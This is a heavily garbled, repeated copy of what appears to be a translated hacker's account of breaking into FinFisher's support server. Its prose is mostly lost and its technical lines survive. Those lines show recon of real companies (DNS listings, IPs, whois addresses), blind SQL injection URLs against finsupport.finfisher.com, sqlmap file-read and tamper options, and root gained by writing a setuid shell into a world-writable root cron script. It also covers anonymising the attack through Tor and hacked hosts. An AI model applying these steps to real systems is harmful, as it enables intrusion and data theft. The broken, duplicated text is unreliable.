, " FinFisher GmbH ". "FinFisher GmbH" inurl:domaintools
gamma-international.de
, finsupport.finfisher.com
.
, . , , , , .
nmap- IP- . SNMP-.
:
-, ? , , , URL IP . fierce
git-, git.companyname.come/gitweb/
. ? , FTP-, . . (VOIP-, IP-, ...) . ?
- . , , nmap , :
-. fierce
, , test.company.com
dev.company.com
, . nikto . webserver/.svn/
, webserver/backup/
, webserver/phpinfo.php
. , . WhatWeb . , wpscan , CMS-Explorer Joomscan . , . , . - - , , . ZAP . . , . , . , , ( ), Google , .
finsupport.finfisher.com
:
nikto
. . . SQL-. WhatWeb . WhatWeb , , , - , Gamma , ? , URL, ( index.php
, , ). Scripts/scripts.js.php
Google: allinurl:"Scripts/scripts.js.php"
, , , -. , , . .
, - : " , - , Gamma Group... "
, , , . :
Google: allinurl:"Scripts/scripts.js.php"
, SQL- , . , - Apache ModSecurity , sqlmap --tamper='tamper/modsecurityversioned.py'
, , PHP- ( JavaScript-) -.
, , .
. : , LFI, JavaScript-, - Location, .
finsupport . /BackOffice/
403 Forbidden , SQL- ( ). print.php
,
https://finsupport.finfisher.com/GGI/Home/print.php?id=1 and 1=1 https://finsupport.finfisher.com/GGI/Home/print.php?id=1 and 2=1
, print.php
, . ! MySQL . , magicquotes
, MySQL- INTO OUTFILE
. , sqlmap --file-read
PHP- URL -, HTML-, PHP- HTML-, .
, , , . , .
( )
___________ < got r00t? > ----------- \ ^__^ \ (oo)\_______ (__)\ )\/\ ||----w | || || ^^^^^^^^^^^^^^^^
root 50% Linux- : Linux_Exploit_Suggester unix-privesc-check .
finsupport
Debian, , unix-privesc-check
:
WARNING: /etc/cron.hourly/mgmtlicensestatus is run by cron as root. The user www-data can write to /etc/cron.hourly/mgmtlicensestatus WARNING: /etc/cron.hourly/webalizer is run by cron as root. The user www-data can write to /etc/cron.hourly/webalizer
/etc/cron.hourly/webalizer :
chown root:root /path/to/my_setuid_shell chmod 04755 /path/to/my_setuid_shell
, ... . , cron
. webalizer
, , . , cron
, , cron
. ls -l /etc/localtime
, 6- , webalizer
, , , . , , , - , , . Root- , .
, . , , . nmap
. nse- nfs-*
smb-*
. finsupport - -, qateam
, .
, . . . :
Gamma FinSpy FinSpy C&C , C&C - , , C&C - FinFisher C&C - DDoS- Gamma Group .
Gamma , , FinSpy , , , , Twitter-.
: , GPU FinSpy-PC+Mobile-2012-07-12-Final.zip (magnet-, 38,7 ) , !
, , , . , .
1) -, Java , Flash Microsoft Office email-, . , / Java / Flash .
, , , 0day- FinSploit VUPEN , . -, . Metasploit-browser autopwn -, , , , Flash -.
2) , 95% , . : " ". , , , .
40 . , PGP- , . GitHub, : https://github.com/FinFisher .
:
Hacker News Reddit
https://www.pentesterlab.com/exercises/ http://overthewire.org/wargames/ http://www.hackthissite.org/ http://smashthestack.org/ http://www.win.tue.nl/~aeb/linux/hh/hh.html http://www.phrack.com/ http://pen-testing.sans.org/blog/2012/04/26/got-meterpreter-pivot http://www.offensive-security.com/metasploit-unleashed/PSExec_Pass_The_Hash https://securusglobal.com/community/2013/12/20/dumping-windows-credentials/ https://www.netspi.com/blog/entryid/140/resources-for-aspiring-penetration-testers ( ) https://www.corelan.be/ ( Exploit writing tutorial part 1) http://websec.wordpress.com/2010/02/22/exploiting-php-file-inclusion-overview/ http://www.dest-unreach.org/socat/
:
The Web Application Hacker's Handbook Hacking: The Art of Exploitation The Database Hacker's Handbook The Art of Software Security Assessment A Bug Hunter's Diary Underground: Tales of Hacking, Madness, and Obsession on the Electronic Frontier TCP/IP Illustrated
-
C:\Documents and Settings\\Local Settings\Temp\ - . Dynamic forking (Process hollowing), , . ( , ). MBR . C:\Windows\Installer\{49FD463C-18F1-63C4-8F12-49F518F127}
, , , ( -), Skype . IP ( 77.69.140.194) 22, 53, 80, 443, 4111 ( - ).
:
40 Skype (, , , , ) (email, , VoIP) - (Windows, Mac OSX Linux)
, FinFisher . , , .
. , - -. .
.
, - - , :
Truecrypt 7.1a . Whonix . Debian, Tor. , Whonix Tor, - , -. aircrack-ng reaver, cantenna.
Whonix, - , , , - . - .
: , Tor. , -, - nmap, sqlmap nikto, , Tor . VPS. Tor , , , .
fierce , whois- IP- .
Blackwater. - (academi.com). :
fierce.pl -dns academi.com 67.238.84.228 email.academi.com 67.238.84.242 extranet.academi.com 67.238.84.240 mail.academi.com 67.238.84.230 secure.academi.com 67.238.84.227 vault.academi.com 54.243.51.249 www.academi.com
whois-www.academi.com
, Amazon Web Service.
NetRange: 67.238.84.224 - 67.238.84.255 CIDR: 67.238.84.224/27 CustName: Blackwater USA Address: 850 Puddin Ridge Rd
whois-academi.com
, ( 850 Puddin Ridge Rd ), whois-. , , Google:
"850 Puddin Ridge Rd" inurl:ip-address-lookup "850 Puddin Ridge Rd" inurl:domaintools
IP-,fierce.pl
,fierce.pl -dns
- IP-. , , .
Google . ,academi.com
, - :
54.236.143.203 careers.academi.com 67.132.195.12 academiproshop.com 67.238.84.236 te.academi.com 67.238.84.238 property.academi.com 67.238.84.241 teams.academi.com
whois- ,academiproshop.com
, .
FinFisherfinsupport.finfisher.com
whois-finfisher.com
, " FinFisher GmbH "."FinFisher GmbH" inurl:domaintools
gamma-international.de
,finsupport.finfisher.com
.
, . , , , , .
nmap- IP- . SNMP-.
:
-, ? , , , URL IP .fierce
git-,git.companyname.come/gitweb/
. ? , FTP-, . . (VOIP-, IP-, ...) . ?
- . , , nmap , :
-.fierce
, ,test.company.com
dev.company.com
, . nikto .webserver/.svn/
,webserver/backup/
,webserver/phpinfo.php
. , . WhatWeb . , wpscan , CMS-Explorer Joomscan . , . , . - - , , . ZAP . . , . , . , , ( ), Google , .
finsupport.finfisher.com
:
nikto
. . . SQL-. WhatWeb . WhatWeb , , , - , Gamma , ? , URL, (index.php
, , ).Scripts/scripts.js.php
Google:allinurl:"Scripts/scripts.js.php"
, , , -. , , . .
, - : " , - , Gamma Group... "
, , , . :
Google:allinurl:"Scripts/scripts.js.php"
, SQL- , . , - Apache ModSecurity , sqlmap--tamper='tamper/modsecurityversioned.py'
, , PHP- ( JavaScript-) -.
, , .
. : , LFI, JavaScript-, - Location, .
finsupport ./BackOffice/
403 Forbidden , SQL- ( ).print.php
,
https://finsupport.finfisher.com/GGI/Home/print.php?id=1 and 1=1 https://finsupport.finfisher.com/GGI/Home/print.php?id=1 and 2=1
,print.php
, . ! MySQL . ,magicquotes
, MySQL-INTO OUTFILE
. ,sqlmap --file-read
PHP- URL -, HTML-, PHP- HTML-, .
, , , . , .
( )
___________ < got r00t? > ----------- \ ^__^ \ (oo)\_______ (__)\ )\/\ ||----w | || || ^^^^^^^^^^^^^^^^
root 50% Linux- : Linux_Exploit_Suggester unix-privesc-check .
finsupport
Debian, ,unix-privesc-check
:
WARNING: /etc/cron.hourly/mgmtlicensestatus is run by cron as root. The user www-data can write to /etc/cron.hourly/mgmtlicensestatus WARNING: /etc/cron.hourly/webalizer is run by cron as root. The user www-data can write to /etc/cron.hourly/webalizer
/etc/cron.hourly/webalizer :
chown root:root /path/to/my_setuid_shell chmod 04755 /path/to/my_setuid_shell
, ... . ,cron
.webalizer
, , . ,cron
, ,cron
.ls -l /etc/localtime
, 6- ,webalizer
, , , . , , , - , , . Root- , .
, . , , .nmap
. nse-nfs-*
smb-*
. finsupport - -,qateam
, .
, . . . :
Gamma FinSpy FinSpy C&C , C&C - , , C&C - FinFisher C&C - DDoS- Gamma Group .
Gamma , , FinSpy , , , , Twitter-.
: , GPU FinSpy-PC+Mobile-2012-07-12-Final.zip (magnet-, 38,7 ) , !
, , , . , .
1) -, Java , Flash Microsoft Office email-, . , / Java / Flash .
, , , 0day- FinSploit VUPEN , . -, . Metasploit-browser autopwn -, , , , Flash -.
2) , 95% , . : " ". , , , .
40 . , PGP- , . GitHub, : https://github.com/FinFisher .
:
Hacker News Reddit
https://www.pentesterlab.com/exercises/ http://overthewire.org/wargames/ http://www.hackthissite.org/ http://smashthestack.org/ http://www.win.tue.nl/~aeb/linux/hh/hh.html http://www.phrack.com/ http://pen-testing.sans.org/blog/2012/04/26/got-meterpreter-pivot http://www.offensive-security.com/metasploit-unleashed/PSExec_Pass_The_Hash https://securusglobal.com/community/2013/12/20/dumping-windows-credentials/ https://www.netspi.com/blog/entryid/140/resources-for-aspiring-penetration-testers ( ) https://www.corelan.be/ ( Exploit writing tutorial part 1) http://websec.wordpress.com/2010/02/22/exploiting-php-file-inclusion-overview/ http://www.dest-unreach.org/socat/
:
The Web Application Hacker's Handbook Hacking: The Art of Exploitation The Database Hacker's Handbook The Art of Software Security Assessment A Bug Hunter's Diary Underground: Tales of Hacking, Madness, and Obsession on the Electronic Frontier TCP/IP Illustrated
-
C:\Documents and Settings\\Local Settings\Temp\ - . Dynamic forking (Process hollowing), , . ( , ). MBR . C:\Windows\Installer\{49FD463C-18F1-63C4-8F12-49F518F127}
, , , ( -), Skype . IP ( 77.69.140.194) 22, 53, 80, 443, 4111 ( - ).
:
40 Skype (, , , , ) (email, , VoIP) - (Windows, Mac OSX Linux)
, FinFisher . , , .
. , - -. .
.
, - - , :
Truecrypt 7.1a . Whonix . Debian, Tor. , Whonix Tor, - , -. aircrack-ng reaver, cantenna.
Whonix, - , , , - . - .
: , Tor. , -, - nmap, sqlmap nikto, , Tor . VPS. Tor , , , .
fierce , whois- IP- .
Blackwater. - (academi.com). :
fierce.pl -dns academi.com 67.238.84.228 email.academi.com 67.238.84.242 extranet.academi.com 67.238.84.240 mail.academi.com 67.238.84.230 secure.academi.com 67.238.84.227 vault.academi.com 54.243.51.249 www.academi.com
whois-www.academi.com
, Amazon Web Service.
NetRange: 67.238.84.224 - 67.238.84.255 CIDR: 67.238.84.224/27 CustName: Blackwater USA Address: 850 Puddin Ridge Rd
whois-academi.com
, ( 850 Puddin Ridge Rd ), whois-. , , Google:
"850 Puddin Ridge Rd" inurl:ip-address-lookup "850 Puddin Ridge Rd" inurl:domaintools
IP-,fierce.pl
,fierce.pl -dns
- IP-. , , .
Google . ,academi.com
, - :
54.236.143.203 careers.academi.com 67.132.195.12 academiproshop.com 67.238.84.236 te.academi.com 67.238.84.238 property.academi.com 67.238.84.241 teams.academi.com
whois- ,academiproshop.com
, .
FinFisherfinsupport.finfisher.com
whois-finfisher.com
, " FinFisher GmbH "."FinFisher GmbH" inurl:domaintools
gamma-international.de
,finsupport.finfisher.com
.
, . , , , , .
nmap- IP- . SNMP-.
:
-, ? , , , URL IP .fierce
git-,git.companyname.come/gitweb/
. ? , FTP-, . . (VOIP-, IP-, ...) . ?
- . , , nmap , :
-.fierce
, ,test.company.com
dev.company.com
, . nikto .webserver/.svn/
,webserver/backup/
,webserver/phpinfo.php
. , . WhatWeb . , wpscan , CMS-Explorer Joomscan . , . , . - - , , . ZAP . . , . , . , , ( ), Google , .
finsupport.finfisher.com
:
nikto
. . . SQL-. WhatWeb . WhatWeb , , , - , Gamma , ? , URL, (index.php
, , ).Scripts/scripts.js.php
Google:allinurl:"Scripts/scripts.js.php"
, , , -. , , . .
, - : " , - , Gamma Group... "
, , , . :
Google:allinurl:"Scripts/scripts.js.php"
, SQL- , . , - Apache ModSecurity , sqlmap--tamper='tamper/modsecurityversioned.py'
, , PHP- ( JavaScript-) -.
, , .
. : , LFI, JavaScript-, - Location, .
finsupport ./BackOffice/
403 Forbidden , SQL- ( ).print.php
,
https://finsupport.finfisher.com/GGI/Home/print.php?id=1 and 1=1 https://finsupport.finfisher.com/GGI/Home/print.php?id=1 and 2=1
,print.php
, . ! MySQL . ,magicquotes
, MySQL-INTO OUTFILE
. ,sqlmap --file-read
PHP- URL -, HTML-, PHP- HTML-, .
, , , . , .
( )
___________ < got r00t? > ----------- \ ^__^ \ (oo)\_______ (__)\ )\/\ ||----w | || || ^^^^^^^^^^^^^^^^
root 50% Linux- : Linux_Exploit_Suggester unix-privesc-check .
finsupport
Debian, ,unix-privesc-check
:
WARNING: /etc/cron.hourly/mgmtlicensestatus is run by cron as root. The user www-data can write to /etc/cron.hourly/mgmtlicensestatus WARNING: /etc/cron.hourly/webalizer is run by cron as root. The user www-data can write to /etc/cron.hourly/webalizer
/etc/cron.hourly/webalizer :
chown root:root /path/to/my_setuid_shell chmod 04755 /path/to/my_setuid_shell
, ... . ,cron
.webalizer
, , . ,cron
, ,cron
.ls -l /etc/localtime
, 6- ,webalizer
, , , . , , , - , , . Root- , .
, . , , .nmap
. nse-nfs-*
smb-*
. finsupport - -,qateam
, .
, . . . :
Gamma FinSpy FinSpy C&C , C&C - , , C&C - FinFisher C&C - DDoS- Gamma Group .
Gamma , , FinSpy , , , , Twitter-.
: , GPU FinSpy-PC+Mobile-2012-07-12-Final.zip (magnet-, 38,7 ) , !
, , , . , .
1) -, Java , Flash Microsoft Office email-, . , / Java / Flash .
, , , 0day- FinSploit VUPEN , . -, . Metasploit-browser autopwn -, , , , Flash -.
2) , 95% , . : " ". , , , .
40 . , PGP- , . GitHub, : https://github.com/FinFisher .
:
Hacker News Reddit
https://www.pentesterlab.com/exercises/ http://overthewire.org/wargames/ http://www.hackthissite.org/ http://smashthestack.org/ http://www.win.tue.nl/~aeb/linux/hh/hh.html http://www.phrack.com/ http://pen-testing.sans.org/blog/2012/04/26/got-meterpreter-pivot http://www.offensive-security.com/metasploit-unleashed/PSExec_Pass_The_Hash https://securusglobal.com/community/2013/12/20/dumping-windows-credentials/ https://www.netspi.com/blog/entryid/140/resources-for-aspiring-penetration-testers ( ) https://www.corelan.be/ ( Exploit writing tutorial part 1) http://websec.wordpress.com/2010/02/22/exploiting-php-file-inclusion-overview/ http://www.dest-unreach.org/socat/
:
The Web Application Hacker's Handbook Hacking: The Art of Exploitation The Database Hacker's Handbook The Art of Software Security Assessment A Bug Hunter's Diary Underground: Tales of Hacking, Madness, and Obsession on the Electronic Frontier TCP/IP Illustrated
-
C:\Documents and Settings\\Local Settings\Temp\ - . Dynamic forking (Process hollowing), , . ( , ). MBR . C:\Windows\Installer\{49FD463C-18F1-63C4-8F12-49F518F127}
, , , ( -), Skype . IP ( 77.69.140.194) 22, 53, 80, 443, 4111 ( - ).
:
40 Skype (, , , , ) (email, , VoIP) - (Windows, Mac OSX Linux)
, FinFisher . , , .
. , - -. .
.
, - - , :
Truecrypt 7.1a . Whonix . Debian, Tor. , Whonix Tor, - , -. aircrack-ng reaver, cantenna.
Whonix, - , , , - . - .
: , Tor. , -, - nmap, sqlmap nikto, , Tor . VPS. Tor , , , .
fierce , whois- IP- .
Blackwater. - (academi.com). :
fierce.pl -dns academi.com 67.238.84.228 email.academi.com 67.238.84.242 extranet.academi.com 67.238.84.240 mail.academi.com 67.238.84.230 secure.academi.com 67.238.84.227 vault.academi.com 54.243.51.249 www.academi.com
whois-www.academi.com
, Amazon Web Service.
NetRange: 67.238.84.224 - 67.238.84.255 CIDR: 67.238.84.224/27 CustName: Blackwater USA Address: 850 Puddin Ridge Rd
whois-academi.com
, ( 850 Puddin Ridge Rd ), whois-. , , Google:
"850 Puddin Ridge Rd" inurl:ip-address-lookup "850 Puddin Ridge Rd" inurl:domaintools
IP-,fierce.pl
,fierce.pl -dns
- IP-. , , .
Google . ,academi.com
, - :
54.236.143.203 careers.academi.com 67.132.195.12 academiproshop.com 67.238.84.236 te.academi.com 67.238.84.238 property.academi.com 67.238.84.241 teams.academi.com
whois- ,academiproshop.com
, .
FinFisherfinsupport.finfisher.com
whois-finfisher.com
, " FinFisher GmbH "."FinFisher GmbH" inurl:domaintools
gamma-international.de
,finsupport.finfisher.com
.
, . , , , , .
nmap- IP- . SNMP-.
:
-, ? , , , URL IP .fierce
git-,git.companyname.come/gitweb/
. ? , FTP-, . . (VOIP-, IP-, ...) . ?
- . , , nmap , :
-.fierce
, ,test.company.com
dev.company.com
, . nikto .webserver/.svn/
,webserver/backup/
,webserver/phpinfo.php
. , . WhatWeb . , wpscan , CMS-Explorer Joomscan . , . , . - - , , . ZAP . . , . , . , , ( ), Google , .
finsupport.finfisher.com
:
nikto
. . . SQL-. WhatWeb . WhatWeb , , , - , Gamma , ? , URL, (index.php
, , ).Scripts/scripts.js.php
Google:allinurl:"Scripts/scripts.js.php"
, , , -. , , . .
, - : " , - , Gamma Group... "
, , , . :
Google:allinurl:"Scripts/scripts.js.php"
, SQL- , . , - Apache ModSecurity , sqlmap--tamper='tamper/modsecurityversioned.py'
, , PHP- ( JavaScript-) -.
, , .
. : , LFI, JavaScript-, - Location, .
finsupport ./BackOffice/
403 Forbidden , SQL- ( ).print.php
,
https://finsupport.finfisher.com/GGI/Home/print.php?id=1 and 1=1 https://finsupport.finfisher.com/GGI/Home/print.php?id=1 and 2=1
,print.php
, . ! MySQL . ,magicquotes
, MySQL-INTO OUTFILE
. ,sqlmap --file-read
PHP- URL -, HTML-, PHP- HTML-, .
, , , . , .
( )
___________ < got r00t? > ----------- \ ^__^ \ (oo)\_______ (__)\ )\/\ ||----w | || || ^^^^^^^^^^^^^^^^
root 50% Linux- : Linux_Exploit_Suggester unix-privesc-check .
finsupport
Debian, ,unix-privesc-check
:
WARNING: /etc/cron.hourly/mgmtlicensestatus is run by cron as root. The user www-data can write to /etc/cron.hourly/mgmtlicensestatus WARNING: /etc/cron.hourly/webalizer is run by cron as root. The user www-data can write to /etc/cron.hourly/webalizer
/etc/cron.hourly/webalizer :
chown root:root /path/to/my_setuid_shell chmod 04755 /path/to/my_setuid_shell
, ... . ,cron
.webalizer
, , . ,cron
, ,cron
.ls -l /etc/localtime
, 6- ,webalizer
, , , . , , , - , , . Root- , .
, . , , .nmap
. nse-nfs-*
smb-*
. finsupport - -,qateam
, .
, . . . :
Gamma FinSpy FinSpy C&C , C&C - , , C&C - FinFisher C&C - DDoS- Gamma Group .
Gamma , , FinSpy , , , , Twitter-.
: , GPU FinSpy-PC+Mobile-2012-07-12-Final.zip (magnet-, 38,7 ) , !
, , , . , .
1) -, Java , Flash Microsoft Office email-, . , / Java / Flash .
, , , 0day- FinSploit VUPEN , . -, . Metasploit-browser autopwn -, , , , Flash -.
2) , 95% , . : " ". , , , .
40 . , PGP- , . GitHub, : https://github.com/FinFisher .
:
Hacker News Reddit
https://www.pentesterlab.com/exercises/ http://overthewire.org/wargames/ http://www.hackthissite.org/ http://smashthestack.org/ http://www.win.tue.nl/~aeb/linux/hh/hh.html http://www.phrack.com/ http://pen-testing.sans.org/blog/2012/04/26/got-meterpreter-pivot http://www.offensive-security.com/metasploit-unleashed/PSExec_Pass_The_Hash https://securusglobal.com/community/2013/12/20/dumping-windows-credentials/ https://www.netspi.com/blog/entryid/140/resources-for-aspiring-penetration-testers ( ) https://www.corelan.be/ ( Exploit writing tutorial part 1) http://websec.wordpress.com/2010/02/22/exploiting-php-file-inclusion-overview/ http://www.dest-unreach.org/socat/
:
The Web Application Hacker's Handbook Hacking: The Art of Exploitation The Database Hacker's Handbook The Art of Software Security Assessment A Bug Hunter's Diary Underground: Tales of Hacking, Madness, and Obsession on the Electronic Frontier TCP/IP Illustrated
-
C:\Documents and Settings\\Local Settings\Temp\ - . Dynamic forking (Process hollowing), , . ( , ). MBR . C:\Windows\Installer\{49FD463C-18F1-63C4-8F12-49F518F127}
, , , ( -), Skype . IP ( 77.69.140.194) 22, 53, 80, 443, 4111 ( - ).
:
40 Skype (, , , , ) (email, , VoIP) - (Windows, Mac OSX Linux)
, FinFisher . , , .
. , - -. .
.
, - - , :
Truecrypt 7.1a . Whonix . Debian, Tor. , Whonix Tor, - , -. aircrack-ng reaver, cantenna.
Whonix, - , , , - . - .
: , Tor. , -, - nmap, sqlmap nikto, , Tor . VPS. Tor , , , .
fierce , whois- IP- .
Blackwater. - (academi.com). :
fierce.pl -dns academi.com 67.238.84.228 email.academi.com 67.238.84.242 extranet.academi.com 67.238.84.240 mail.academi.com 67.238.84.230 secure.academi.com 67.238.84.227 vault.academi.com 54.243.51.249 www.academi.com
whois-www.academi.com
, Amazon Web Service.
NetRange: 67.238.84.224 - 67.238.84.255 CIDR: 67.238.84.224/27 CustName: Blackwater USA Address: 850 Puddin Ridge Rd
whois-academi.com
, ( 850 Puddin Ridge Rd ), whois-. , , Google:
"850 Puddin Ridge Rd" inurl:ip-address-lookup "850 Puddin Ridge Rd" inurl:domaintools
IP-,fierce.pl
,fierce.pl -dns
- IP-. , , .
Google . ,academi.com
, - :
54.236.143.203 careers.academi.com 67.132.195.12 academiproshop.com 67.238.84.236 te.academi.com 67.238.84.238 property.academi.com 67.238.84.241 teams.academi.com
whois- ,academiproshop.com
, .
FinFisherfinsupport.finfisher.com
whois-finfisher.com
, " FinFisher GmbH "."FinFisher GmbH" inurl:domaintools
gamma-international.de
,finsupport.finfisher.com
.
, . , , , , .
nmap- IP- . SNMP-.
:
-, ? , , , URL IP .fierce
git-,git.companyname.come/gitweb/
. ? , FTP-, . . (VOIP-, IP-, ...) . ?
- . , , nmap , :
-.fierce
, ,test.company.com
dev.company.com
, . nikto .webserver/.svn/
,webserver/backup/
,webserver/phpinfo.php
. , . WhatWeb . , wpscan , CMS-Explorer Joomscan . , . , . - - , , . ZAP . . , . , . , , ( ), Google , .
finsupport.finfisher.com
:
nikto
. . . SQL-. WhatWeb . WhatWeb , , , - , Gamma , ? , URL, (index.php
, , ).Scripts/scripts.js.php
Google:allinurl:"Scripts/scripts.js.php"
, , , -. , , . .
, - : " , - , Gamma Group... "
, , , . :
Google:allinurl:"Scripts/scripts.js.php"
, SQL- , . , - Apache ModSecurity , sqlmap--tamper='tamper/modsecurityversioned.py'
, , PHP- ( JavaScript-) -.
, , .
. : , LFI, JavaScript-, - Location, .
finsupport ./BackOffice/
403 Forbidden , SQL- ( ).print.php
,
https://finsupport.finfisher.com/GGI/Home/print.php?id=1 and 1=1 https://finsupport.finfisher.com/GGI/Home/print.php?id=1 and 2=1
,print.php
, . ! MySQL . ,magicquotes
, MySQL-INTO OUTFILE
. ,sqlmap --file-read
PHP- URL -, HTML-, PHP- HTML-, .
, , , . , .
( )
___________ < got r00t? > ----------- \ ^__^ \ (oo)\_______ (__)\ )\/\ ||----w | || || ^^^^^^^^^^^^^^^^
root 50% Linux- : Linux_Exploit_Suggester unix-privesc-check .
finsupport
Debian, ,unix-privesc-check
:
WARNING: /etc/cron.hourly/mgmtlicensestatus is run by cron as root. The user www-data can write to /etc/cron.hourly/mgmtlicensestatus WARNING: /etc/cron.hourly/webalizer is run by cron as root. The user www-data can write to /etc/cron.hourly/webalizer
/etc/cron.hourly/webalizer :
chown root:root /path/to/my_setuid_shell chmod 04755 /path/to/my_setuid_shell
, ... . ,cron
.webalizer
, , . ,cron
, ,cron
.ls -l /etc/localtime
, 6- ,webalizer
, , , . , , , - , , . Root- , .
, . , , .nmap
. nse-nfs-*
smb-*
. finsupport - -,qateam
, .
, . . . :
Gamma FinSpy FinSpy C&C , C&C - , , C&C - FinFisher C&C - DDoS- Gamma Group .
Gamma , , FinSpy , , , , Twitter-.
: , GPU FinSpy-PC+Mobile-2012-07-12-Final.zip (magnet-, 38,7 ) , !
, , , . , .
1) -, Java , Flash Microsoft Office email-, . , / Java / Flash .
, , , 0day- FinSploit VUPEN , . -, . Metasploit-browser autopwn -, , , , Flash -.
2) , 95% , . : " ". , , , .
40 . , PGP- , . GitHub, : https://github.com/FinFisher .
:
Hacker News Reddit
https://www.pentesterlab.com/exercises/ http://overthewire.org/wargames/ http://www.hackthissite.org/ http://smashthestack.org/ http://www.win.tue.nl/~aeb/linux/hh/hh.html http://www.phrack.com/ http://pen-testing.sans.org/blog/2012/04/26/got-meterpreter-pivot http://www.offensive-security.com/metasploit-unleashed/PSExec_Pass_The_Hash https://securusglobal.com/community/2013/12/20/dumping-windows-credentials/ https://www.netspi.com/blog/entryid/140/resources-for-aspiring-penetration-testers ( ) https://www.corelan.be/ ( Exploit writing tutorial part 1) http://websec.wordpress.com/2010/02/22/exploiting-php-file-inclusion-overview/ http://www.dest-unreach.org/socat/
:
The Web Application Hacker's Handbook Hacking: The Art of Exploitation The Database Hacker's Handbook The Art of Software Security Assessment A Bug Hunter's Diary Underground: Tales of Hacking, Madness, and Obsession on the Electronic Frontier TCP/IP Illustrated
-
C:\Documents and Settings\\Local Settings\Temp\ - . Dynamic forking (Process hollowing), , . ( , ). MBR . C:\Windows\Installer\{49FD463C-18F1-63C4-8F12-49F518F127}
, , , ( -), Skype . IP ( 77.69.140.194) 22, 53, 80, 443, 4111 ( - ).
:
40 Skype (, , , , ) (email, , VoIP) - (Windows, Mac OSX Linux)
, FinFisher . , , .
. , - -. .
.
, - - , :
Truecrypt 7.1a . Whonix . Debian, Tor. , Whonix Tor, - , -. aircrack-ng reaver, cantenna.
Whonix, - , , , - . - .
: , Tor. , -, - nmap, sqlmap nikto, , Tor . VPS. Tor , , , .
fierce , whois- IP- .
Blackwater. - (academi.com). :
fierce.pl -dns academi.com 67.238.84.228 email.academi.com 67.238.84.242 extranet.academi.com 67.238.84.240 mail.academi.com 67.238.84.230 secure.academi.com 67.238.84.227 vault.academi.com 54.243.51.249 www.academi.com
whois-www.academi.com
, Amazon Web Service.
NetRange: 67.238.84.224 - 67.238.84.255 CIDR: 67.238.84.224/27 CustName: Blackwater USA Address: 850 Puddin Ridge Rd
whois-academi.com
, ( 850 Puddin Ridge Rd ), whois-. , , Google:
"850 Puddin Ridge Rd" inurl:ip-address-lookup "850 Puddin Ridge Rd" inurl:domaintools
IP-,fierce.pl
,fierce.pl -dns
- IP-. , , .
Google . ,academi.com
, - :
54.236.143.203 careers.academi.com 67.132.195.12 academiproshop.com 67.238.84.236 te.academi.com 67.238.84.238 property.academi.com 67.238.84.241 teams.academi.com
whois- ,academiproshop.com
, .
FinFisherfinsupport.finfisher.com
whois-finfisher.com
, " FinFisher GmbH "."FinFisher GmbH" inurl:domaintools
gamma-international.de
,finsupport.finfisher.com
.
, . , , , , .
nmap- IP- . SNMP-.
:
-, ? , , , URL IP .fierce
git-,git.companyname.come/gitweb/
. ? , FTP-, . . (VOIP-, IP-, ...) . ?
- . , , nmap , :
-.fierce
, ,test.company.com
dev.company.com
, . nikto .webserver/.svn/
,webserver/backup/
,webserver/phpinfo.php
. , . WhatWeb . , wpscan , CMS-Explorer Joomscan . , . , . - - , , . ZAP . . , . , . , , ( ), Google , .
finsupport.finfisher.com
:
nikto
. . . SQL-. WhatWeb . WhatWeb , , , - , Gamma , ? , URL, (index.php
, , ).Scripts/scripts.js.php
Google:allinurl:"Scripts/scripts.js.php"
, , , -. , , . .
, - : " , - , Gamma Group... "
, , , . :
Google:allinurl:"Scripts/scripts.js.php"
, SQL- , . , - Apache ModSecurity , sqlmap--tamper='tamper/modsecurityversioned.py'
, , PHP- ( JavaScript-) -.
, , .
. : , LFI, JavaScript-, - Location, .
finsupport ./BackOffice/
403 Forbidden , SQL- ( ).print.php
,
https://finsupport.finfisher.com/GGI/Home/print.php?id=1 and 1=1 https://finsupport.finfisher.com/GGI/Home/print.php?id=1 and 2=1
,print.php
, . ! MySQL . ,magicquotes
, MySQL-INTO OUTFILE
. ,sqlmap --file-read
PHP- URL -, HTML-, PHP- HTML-, .
, , , . , .
( )
___________ < got r00t? > ----------- \ ^__^ \ (oo)\_______ (__)\ )\/\ ||----w | || || ^^^^^^^^^^^^^^^^
root 50% Linux- : Linux_Exploit_Suggester unix-privesc-check .
finsupport
Debian, ,unix-privesc-check
:
WARNING: /etc/cron.hourly/mgmtlicensestatus is run by cron as root. The user www-data can write to /etc/cron.hourly/mgmtlicensestatus WARNING: /etc/cron.hourly/webalizer is run by cron as root. The user www-data can write to /etc/cron.hourly/webalizer
/etc/cron.hourly/webalizer :
chown root:root /path/to/my_setuid_shell chmod 04755 /path/to/my_setuid_shell
, ... . ,cron
.webalizer
, , . ,cron
, ,cron
.ls -l /etc/localtime
, 6- ,webalizer
, , , . , , , - , , . Root- , .
, . , , .nmap
. nse-nfs-*
smb-*
. finsupport - -,qateam
, .
, . . . :
Gamma FinSpy FinSpy C&C , C&C - , , C&C - FinFisher C&C - DDoS- Gamma Group .
Gamma , , FinSpy , , , , Twitter-.
: , GPU FinSpy-PC+Mobile-2012-07-12-Final.zip (magnet-, 38,7 ) , !
, , , . , .
1) -, Java , Flash Microsoft Office email-, . , / Java / Flash .
, , , 0day- FinSploit VUPEN , . -, . Metasploit-browser autopwn -, , , , Flash -.
2) , 95% , . : " ". , , , .
40 . , PGP- , . GitHub, : https://github.com/FinFisher .
:
Hacker News Reddit
https://www.pentesterlab.com/exercises/ http://overthewire.org/wargames/ http://www.hackthissite.org/ http://smashthestack.org/ http://www.win.tue.nl/~aeb/linux/hh/hh.html http://www.phrack.com/ http://pen-testing.sans.org/blog/2012/04/26/got-meterpreter-pivot http://www.offensive-security.com/metasploit-unleashed/PSExec_Pass_The_Hash https://securusglobal.com/community/2013/12/20/dumping-windows-credentials/ https://www.netspi.com/blog/entryid/140/resources-for-aspiring-penetration-testers ( ) https://www.corelan.be/ ( Exploit writing tutorial part 1) http://websec.wordpress.com/2010/02/22/exploiting-php-file-inclusion-overview/ http://www.dest-unreach.org/socat/
:
The Web Application Hacker's Handbook Hacking: The Art of Exploitation The Database Hacker's Handbook The Art of Software Security Assessment A Bug Hunter's Diary Underground: Tales of Hacking, Madness, and Obsession on the Electronic Frontier TCP/IP Illustrated
-
C:\Documents and Settings\\Local Settings\Temp\ - . Dynamic forking (Process hollowing), , . ( , ). MBR . C:\Windows\Installer\{49FD463C-18F1-63C4-8F12-49F518F127}
, , , ( -), Skype . IP ( 77.69.140.194) 22, 53, 80, 443, 4111 ( - ).
:
40 Skype (, , , , ) (email, , VoIP) - (Windows, Mac OSX Linux)
, FinFisher . , , .
. , - -. .
.
, - - , :
Truecrypt 7.1a . Whonix . Debian, Tor. , Whonix Tor, - , -. aircrack-ng reaver, cantenna.
Whonix, - , , , - . - .
